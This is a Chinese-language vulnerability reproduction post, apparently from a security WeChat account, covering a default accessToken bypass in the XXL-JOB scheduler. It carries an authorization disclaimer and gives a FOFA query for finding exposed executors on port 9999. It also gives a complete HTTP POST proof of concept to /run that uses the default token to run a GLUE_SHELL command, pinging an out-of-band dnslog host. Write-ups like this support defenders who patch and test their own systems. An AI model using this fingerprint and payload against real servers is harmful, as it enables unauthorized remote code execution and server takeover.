【漏洞复现】XXL-JOB默认accessToken身份绕过漏洞【附POC】

声明：此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

现在只对常读和星标的公众号才展示大图推送，建议大家把猫蛋儿安全“设为星标”，否则可能看不到了！

产品简介

XXL-JOB 是一款开源的分布式任务调度平台，用于实现大规模任务的调度和执行。

漏洞简介

XXL-JOB 默认配置下，用于调度通讯的 accessToken 不是随机生成的，而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值，攻击者可利用此绕过认证调用 executor，执行任意代码，从而获取服务器权限。

影响版本

使用XXL-JOB默认AccessToken的所有版本

指纹识别

fofa："invalid request, HttpMethod not support" && port="9999"

漏洞验证

漏洞比较简单，/run，XXL-JOB 执行器RUSTful API，之前XXL-JOB已经爆出过未授权访问，这次的漏洞原因在于修复后的鉴权token使用了默认的token，可以被绕过，感兴趣同学自行对比代码审计。

POC：

POST /run HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: closeHost: Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default tokenUpgrade-Insecure-Requests: 1Content-Length: 333{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "SERIAL_EXECUTION","executorTimeout": 0,"logId": 1,"logDateTime": 1586373637819,"glueType": "GLUE_SHELL","glueSource": "ping xxx.dnslog.cn","glueUpdatetime": 1586693836766,"broadcastIndex": 0,"broadcastTotal": 0}